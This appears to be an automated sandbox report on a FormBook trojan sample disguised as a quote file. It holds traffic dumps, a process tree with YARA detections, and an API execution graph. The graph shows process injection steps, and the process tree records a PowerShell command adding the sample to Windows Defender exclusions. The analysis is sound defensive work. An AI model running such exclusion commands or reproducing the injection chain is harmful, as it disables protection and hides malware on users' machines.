                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 62 34 30 56 31 37 68 34 48 72 58 79 79 39 6d 78 6a 43 53 35 45 34 4f 66 70 47 75 57 68 57 67 48 45 4b 2f 32 4a 6e 43 58 39 39 4f 36 30 4b 2f 57 35 49 43 57 46 4f 6f 4f 44 6a 68 66 62 58 35 59 62 76 4c 4a 4c 4b 44 6e 32 7a 75 4f 46 54 71 5a 69 69 32 51 61 6d 43 65 38 37 79 50 54 68 76 39 4b 79 6b 6a 78 74 45 69 34 2b 78 46 31 66 64 5a 5a 4e 31 68 78 76 55 61 79 46 50 55 70 69 6e 76 44 2f 59 73 74 45 74 4d 4c 77 58 46 75 4b 64 63 4e 54 54 67 4f 71 4e 68 76 47 74 52 6d 6a 62 73 69 62 31 31 73 4e 57 35 58 57 75 5a 77 72 32 49 39 61 61 48 69 66 58 73 30 51 77 55 57 74 36 55 64 39 6a 39 61 4d 63 3d
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=b40V17h4HrXyy9mxjCS5E4OfpGuWhWgHEK/2JnCX99O60K/W5ICWFOoODjhfbX5YbvLJLKDn2zuOFTqZii2QamCe87yPThv9KykjxtEi4+xF1fdZZN1hxvUayFPUpinvD/YstEtMLwXFuKdcNTTgOqNhvGtRmjbsib11sNW5XWuZwr2I9aaHifXs0QwUWt6Ud9j9aMc=
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.986254930 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                              date: Thu, 24 Oct 2024 13:21:21 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 01 ad d4 bb b8 48 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 8f 2f 33 ab 2b eb b7 df 7e 7b fc 27 6e c9 ae 0d 85 1f 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 35 9d 6f bf 5d 7e 26 6e 65 82 19 55 7e ef 1e eb b0 79 ba 63 b3 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 59 94 6e f5 54 57 de 3d 79 f7 29 1d d3 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 14 a6 9f 98 ff c8 0a be cb c3 c2 2d af 96 20 ef a8 a7 66 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 9a f1 7d 69 9b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 ce aa c1 24 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab da ca 9c d3 e0 ef 97 a9 fd 67 df 3c a0 9d 7b cf 4c c2 f8 f4 30 a0 0b b0 ed 97 81 e0 c6 8d 5b 85 b6 f9 65 50 9a 69 79 5f ba 45 e8 fd e5 c7 65 65 78 76 1f 06 28 91 77 ef [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 1352ZrHr?OAa{7j$H$@$Hn85d.PRbKpD#+/3+~{'nU5o]~&neU~ycr:~z{YnTW=y)~}W>]- f>5YQ]MkCmea}i~NF @$S~|VeYbwE]vYg<{L0[ePiy_Eeexv(w0u7%0r8Fz?2/zxwiac8a?n]~gt*/@r}8a&gv&NLdU~Y?>@kI 2S/U}.uf5"5,|=6^C3\qv]]@~>Pl*-ricpu]ozfQ8MM.mJ[Oua&H~p0}sehc+,y{KzJ7Ya{}zA<b+k|C5nql<x] 4Fj5}d_Pc%f/i|*C7{CrwMZSY_}d|f68!7~v$\>a} 5w>)$[G+7)z=^Kp-T p@[]cdtj~ S'-:3>"m?Q
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.986274958 CEST1236INData Raw: 40 09 fc cd 0c 6f fc fc 2d 71 9d d0 1c fc 29 01 81 f4 c5 30 e3 11 99 77 7f be d9 e6 16 b5 37 c3 bd f2 f2 ac bc 64 a8 87 41 e1 c6 20 d6 35 37 0e d8 cf e9 23 16 f0 9f f6 61 10 84 8e e3 a6 6f 2c f5 a3 7d bb ca 4f 17 64 3f fb f5 fb 79 6f ec f7 2b 6e
                                                                                                                                                                                                                                              Data Ascii: @o-q)0w7dA 57#ao,}Od?yo+nY0{Q%~p(h=u/"]G}~=q<^z?4GLRb ,d^s"?g^a0oeZero>z9
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.986285925 CEST1236INData Raw: 17 2e 4b 9c 5a c0 a2 d1 86 cb 4e 13 7c 97 9f db 89 25 89 94 6d 0b 1a eb 74 ba 6b 98 e9 24 57 67 12 a3 73 e2 a4 6b 51 3b 98 85 0c 9d 25 d1 19 ef 08 3c 86 d2 7a 3b 4d b6 41 a4 96 88 39 32 c6 86 b0 71 c7 63 2c 41 ab 7d ac 33 7c 30 17 a9 68 94 d6 0b
                                                                                                                                                                                                                                              Data Ascii: .KZN|%mtk$WgskQ;%<z;MA92qc,A}3|0hgyeSY q6M5YRul!NilKW|&o=[ZyS8\.Y1JBe.%?$1"QSN\F^9#/e[opE+b
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.986299992 CEST1236INData Raw: 68 43 00 a7 56 98 a6 3d 1f 97 71 bd 6e 02 8e d9 30 98 49 88 a7 0e 26 f4 6e 51 74 a4 9f 9d ec 2d a2 f3 fe 92 38 61 0b 5c 80 f4 78 b8 13 61 a2 c9 ec 51 b1 8f 68 9c c9 1b 3c 3d 78 2b 38 0d b4 31 89 82 d0 2c 8f 2a 62 e9 6e 3b b5 ab a3 d4 af 67 e8 8a
                                                                                                                                                                                                                                              Data Ascii: hCV=qn0I&nQt-8a\xaQh<=x+81,*bn;g$hM#>VN. a!@ Yv:I^:(zc}|;!4^'K_:+";x3eLh2:3pcP u9.M@f*jqHqN[y
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.986314058 CEST294INData Raw: 23 82 f7 31 cf 4e f7 76 e5 7c 37 80 7f 42 fe 4a a8 eb 4b e6 4f 64 b9 66 ff 53 e8 7e 06 ab 3f bd e0 ea cf 9f 6a e3 22 f0 7b 5b 5e ef f8 3c fc 47 1a 03 ea 7c a7 84 67 55 dd 7d 7b 84 3f 5b f5 08 7f 64 9e 1b 40 7d c0 d7 55 8c 78 65 f1 f1 b9 b6 f7 5e
                                                                                                                                                                                                                                              Data Ascii: #1Nv|7BJKOdfS~?j"{[^<G|gU}{?[d@}Uxe^Wgt=@fw2}zn_HV'3$O}(NGf%(M}cg&>~/1~0g`u|~t!w378x^j t4


                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                              Start time:09:17:08
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\QUOTE2342534.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\QUOTE2342534.exe"
                                                                                                                                                                                                                                              Imagebase:0x4c0000
                                                                                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                                                                                              MD5 hash:C19949939D08BAEE86643132D7CE7542
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                              Start time:09:17:09
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe"
                                                                                                                                                                                                                                              Imagebase:0x4f0000
                                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                              Start time:09:17:09
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\QUOTE2342534.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\QUOTE2342534.exe"
                                                                                                                                                                                                                                              Imagebase:0xc60000
                                                                                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                                                                                              MD5 hash:C19949939D08BAEE86643132D7CE7542
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2232369881.0000000001620000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2232369881.0000000001620000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2233350481.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2233350481.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                              Start time:09:17:09
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                              Start time:09:17:12
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                              Imagebase:0x7ff6ef0c0000
                                                                                                                                                                                                                                              File size:496'640 bytes
                                                                                                                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                              Start time:09:17:12
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe"
                                                                                                                                                                                                                                              Imagebase:0x120000
                                                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                              Start time:09:17:14
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\mshta.exe"
                                                                                                                                                                                                                                              Imagebase:0x470000
                                                                                                                                                                                                                                              File size:13'312 bytes
                                                                                                                                                                                                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                              Start time:09:17:26
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe"
                                                                                                                                                                                                                                              Imagebase:0x120000
                                                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4597123623.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4597123623.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                              Start time:09:17:38
                                                                                                                                                                                                                                              Start date:24/10/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                                              Imagebase:0x7ff79f9e0000
                                                                                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:11.4%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:3.6%
                                                                                                                                                                                                                                                Total number of Nodes:165
                                                                                                                                                                                                                                                Total number of Limit Nodes:8
                                                                                                                                                                                                                                                execution_graph 29794 89ffd7e 29795 89ffd0c 29794->29795 29796 89ffd81 29794->29796 29797 89ffd3a 29795->29797 29810 ef4030e 29795->29810 29814 ef401ec 29795->29814 29821 ef4014c 29795->29821 29825 ef40741 29795->29825 29830 ef40ae4 29795->29830 29835 ef408fa 29795->29835 29839 ef4035a 29795->29839 29846 ef402bf 29795->29846 29853 ef409df 29795->29853 29857 ef4023c 29795->29857 29862 ef406b7 29795->29862 29867 ef4022a 29795->29867 29872 89fe519 29810->29872 29876 89fe520 29810->29876 29811 ef40328 29811->29797 29815 ef401ef 29814->29815 29817 89fe519 Wow64SetThreadContext 29815->29817 29818 89fe520 Wow64SetThreadContext 29815->29818 29816 ef4020a 29880 89fe468 29816->29880 29884 89fe470 29816->29884 29817->29816 29818->29816 29888 89fe940 29821->29888 29892 89fe934 29821->29892 29826 ef40aeb 29825->29826 29827 ef40b0d 29826->29827 29896 89fe7a8 29826->29896 29900 89fe7a0 29826->29900 29831 ef40aea 29830->29831 29833 89fe7a8 ReadProcessMemory 29831->29833 29834 89fe7a0 ReadProcessMemory 29831->29834 29832 ef40b0d 29833->29832 29834->29832 29836 ef40900 29835->29836 29837 89fe468 ResumeThread 29836->29837 29838 89fe470 ResumeThread 29836->29838 29837->29836 29838->29836 29912 89fe5f8 29839->29912 29916 89fe5f1 29839->29916 29840 ef401ad 29840->29797 29841 ef40253 29841->29840 29904 89fe6b8 29841->29904 29908 89fe6b1 29841->29908 29847 ef401ef 29846->29847 29848 ef4020a 29847->29848 29849 89fe519 Wow64SetThreadContext 29847->29849 29850 89fe520 Wow64SetThreadContext 29847->29850 29851 89fe468 ResumeThread 29848->29851 29852 89fe470 ResumeThread 29848->29852 29849->29848 29850->29848 29851->29848 29852->29848 29854 ef409fa 29853->29854 29855 89fe468 ResumeThread 29854->29855 29856 89fe470 ResumeThread 29854->29856 29855->29854 29856->29854 29858 ef40242 29857->29858 29859 ef401ad 29858->29859 29860 89fe6b8 WriteProcessMemory 29858->29860 29861 89fe6b1 WriteProcessMemory 29858->29861 29859->29797 29860->29858 29861->29858 29865 89fe6b8 WriteProcessMemory 29862->29865 29866 89fe6b1 WriteProcessMemory 29862->29866 29863 ef40597 29863->29862 29864 ef4084a 29863->29864 29865->29863 29866->29863 29868 ef4081f 29867->29868 29870 89fe6b8 WriteProcessMemory 29868->29870 29871 89fe6b1 WriteProcessMemory 29868->29871 29869 ef405bd 29869->29797 29870->29869 29871->29869 29873 89fe565 Wow64SetThreadContext 29872->29873 29875 89fe5ad 29873->29875 29875->29811 29877 89fe565 Wow64SetThreadContext 29876->29877 29879 89fe5ad 29877->29879 29879->29811 29881 89fe4b0 ResumeThread 29880->29881 29883 89fe4e1 29881->29883 29883->29816 29885 89fe4b0 ResumeThread 29884->29885 29887 89fe4e1 29885->29887 29887->29816 29889 89fe9c9 CreateProcessA 29888->29889 29891 89feb8b 29889->29891 29893 89fe9c9 CreateProcessA 29892->29893 29895 89feb8b 29893->29895 29897 89fe7f3 ReadProcessMemory 29896->29897 29899 89fe837 29897->29899 29899->29827 29901 89fe7f3 ReadProcessMemory 29900->29901 29903 89fe837 29901->29903 29903->29827 29905 89fe700 WriteProcessMemory 29904->29905 29907 89fe757 29905->29907 29907->29841 29909 89fe700 WriteProcessMemory 29908->29909 29911 89fe757 29909->29911 29911->29841 29913 89fe638 VirtualAllocEx 29912->29913 29915 89fe675 29913->29915 29915->29841 29917 89fe638 VirtualAllocEx 29916->29917 29919 89fe675 29917->29919 29919->29841 29920 89f38fa 29921 89f3834 29920->29921 29924 89f3374 29921->29924 29928 89f3380 29921->29928 29925 89f40b8 OutputDebugStringW 29924->29925 29927 89f4137 29925->29927 29927->29921 29929 89f4168 CloseHandle 29928->29929 29931 89f41d6 29929->29931 29931->29921 29932 89f3778 29933 89f379c 29932->29933 29934 89f3374 OutputDebugStringW 29933->29934 29935 89f3380 CloseHandle 29933->29935 29934->29933 29935->29933 29936 efd3d8 29937 efd41e GetCurrentProcess 29936->29937 29939 efd470 GetCurrentThread 29937->29939 29941 efd469 29937->29941 29940 efd4ad GetCurrentProcess 29939->29940 29942 efd4a6 29939->29942 29943 efd4e3 29940->29943 29941->29939 29942->29940 29944 efd50b GetCurrentThreadId 29943->29944 29945 efd53c 29944->29945 29744 ef40f28 29745 ef410b3 29744->29745 29746 ef40f4e 29744->29746 29746->29745 29749 ef411a1 PostMessageW 29746->29749 29751 ef411a8 PostMessageW 29746->29751 29750 ef41214 29749->29750 29750->29746 29752 ef41214 29751->29752 29752->29746 29742 efd620 DuplicateHandle 29743 efd6b6 29742->29743 29753 89f1b00 29754 89f1b1c 29753->29754 29758 89f2a38 29754->29758 29763 89f2a28 29754->29763 29755 89f1bc6 29759 89f2a4a 29758->29759 29768 89f2a78 29759->29768 29773 89f2a68 29759->29773 29760 89f2a5e 29760->29755 29764 89f2a4a 29763->29764 29766 89f2a78 2 API calls 29764->29766 29767 89f2a68 2 API calls 29764->29767 29765 89f2a5e 29765->29755 29766->29765 29767->29765 29769 89f2a92 29768->29769 29778 89f2b38 29769->29778 29783 89f2b48 29769->29783 29770 89f2ab5 29770->29760 29774 89f2a92 29773->29774 29776 89f2b38 2 API calls 29774->29776 29777 89f2b48 2 API calls 29774->29777 29775 89f2ab5 29775->29760 29776->29775 29777->29775 29779 89f2b46 29778->29779 29788 89f2ca8 29779->29788 29791 89f2ca0 29779->29791 29780 89f2bf3 29780->29770 29784 89f2b6c 29783->29784 29786 89f2ca8 NtQueryInformationProcess 29784->29786 29787 89f2ca0 NtQueryInformationProcess 29784->29787 29785 89f2bf3 29785->29770 29786->29785 29787->29785 29789 89f2cf3 NtQueryInformationProcess 29788->29789 29790 89f2d36 29789->29790 29790->29780 29792 89f2cf3 NtQueryInformationProcess 29791->29792 29793 89f2d36 29792->29793 29793->29780 29946 efac50 29947 efac52 29946->29947 29951 efad48 29947->29951 29956 efad37 29947->29956 29948 efac5f 29952 efad7c 29951->29952 29953 efad59 29951->29953 29952->29948 29953->29952 29954 efaf80 GetModuleHandleW 29953->29954 29955 efafad 29954->29955 29955->29948 29958 efad3c 29956->29958 29957 efad7c 29957->29948 29958->29957 29959 efaf80 GetModuleHandleW 29958->29959 29960 efafad 29959->29960 29960->29948

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 089F2CA0 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 089F2D27
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InformationProcessQuery
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1778838933-0
                                                                                                                                                                                                                                                • Opcode ID: 0e5c1a1575c96edacb5969196eef0755b2970b91bbfb5b9d168045ea074e3576
                                                                                                                                                                                                                                                • Instruction ID: 1022e2ad54f21f61b26f5007a90a4881ff3143ae0004a31f9481b8c1c161a9d3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e5c1a1575c96edacb5969196eef0755b2970b91bbfb5b9d168045ea074e3576
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE21EFB6900249DFCB10DF9AD985ADEFBF4FF48310F20842AE918A7650C379A540CFA1
                                                                                                                                                                                                                                                Function 089F2CA8 Relevance: 1.6, APIs: 1, Instructions: 55nativeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 089F2D27
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InformationProcessQuery
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1778838933-0
                                                                                                                                                                                                                                                • Opcode ID: 24916f2b82d8e1ca9c45eeeb97f84d34035f1c0759c7fe9edc93a2e4de3aa4ed
                                                                                                                                                                                                                                                • Instruction ID: 34cb3277381007c5a779bff078b4d97fe5a19dbd5273728939683b6febc71017
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24916f2b82d8e1ca9c45eeeb97f84d34035f1c0759c7fe9edc93a2e4de3aa4ed
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2421CEB5900349DFCB10DF9AD884ADEFBF9FB48310F10842AE918A7250C379A944CFA5
                                                                                                                                                                                                                                                Function 089F0040 Relevance: .5, Instructions: 506COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
